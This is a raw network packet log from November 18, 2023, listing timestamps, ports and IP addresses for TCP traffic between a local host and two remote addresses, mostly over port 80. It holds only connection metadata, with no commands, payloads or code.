Nov 18, 2023 10:02:35.023614883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023631096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023648024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023667097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023684025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.023701906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.024930000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025105000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025132895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025266886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025321007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025552034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.025716066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.099301100 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:35.144711018 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:35.323246956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323391914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323410034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323427916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323448896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323467016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323477983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323483944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323501110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323518991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323535919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323544025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323544025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323554039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323570967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323571920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323587894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323594093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323611021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323627949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323642015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323652029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323671103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323685884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323688984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323708057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323709965 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323725939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323743105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323746920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323760033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323786020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323786974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323802948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323820114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323827028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323836088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323843956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323853970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323873043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323889017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323896885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323914051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323930025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323940039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323946953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323962927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323965073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.323980093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.323997021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324012995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324012995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324031115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324048996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324053049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324067116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324069977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324086905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324104071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324120998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324122906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324137926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324157953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324166059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324173927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324192047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324208021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324208975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324225903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324228048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324243069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324259996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324260950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324276924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324282885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324294090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324310064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324326038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324327946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324346066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324358940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324362993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324382067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324382067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324407101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324423075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324424028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324440956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324455976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324474096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324474096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324490070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324492931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324508905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324526072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324529886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324542999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324561119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324569941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324578047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324596882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324609041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324615955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324635029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324635983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324651957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324668884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324676037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324687958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324707031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324711084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324723005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324739933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324743986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324757099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324769974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324774027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324798107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324815989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324816942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324834108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324850082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324851036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324867010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324883938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324884892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324901104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324917078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324934006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324934959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324950933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324970961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.324981928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324981928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.324986935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325002909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325018883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325025082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325036049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325053930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325069904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325078011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325078964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325088024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325104952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325120926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325139046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325141907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325155020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325170994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325184107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325189114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325201035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325206995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325222015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325223923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325253963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325270891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325280905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325289011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325305939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325315952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325324059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325341940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325361013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325361967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325378895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325381041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325396061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325412989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325428009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325438976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325444937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325462103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325478077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325479031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325495958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325496912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325511932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325514078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325531006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325546980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325551987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325562954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325579882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325588942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325596094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325612068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325613022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325634003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325650930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325666904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325670004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325685024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325699091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325702906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325715065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325721025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325737953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325753927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325757980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325771093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325787067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325789928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325803041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325820923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325834990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325850964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325865030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325866938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325884104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325900078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325901985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325917959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325922012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325934887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325951099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325961113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.325968981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325989008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.325998068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326008081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326021910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326028109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326045036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326061964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326069117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326078892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326096058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326102972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326112986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326119900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326128960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326147079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326160908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326164007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326181889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326199055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326209068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326215982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326232910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326246023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326250076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326267004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326283932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326287031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326299906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326317072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326325893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326334000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326350927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326361895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326369047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326378107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326385021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326400042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326401949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326420069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326436043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326440096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326452971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326478004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326479912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326495886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326514006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326530933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326533079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326550007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326566935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326570988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326585054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326587915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326606035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326622963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326627016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326642036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326662064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326668978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326678991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326689005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326699018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326718092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326736927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326736927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326755047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326771975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326772928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326788902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326807022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326809883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326823950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326842070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326853991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326859951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326874971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326877117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326894045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326911926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326920986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326929092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326946020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326966047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.326967001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.326986074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327003002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327006102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327019930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327028036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327038050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327054977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327061892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327071905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327089071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327105045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327105999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327121973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327122927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327141047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327162027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327164888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327178955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327195883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327203035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327214956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327231884 CET	80	49744	194.49.94.120	192.168.2.4
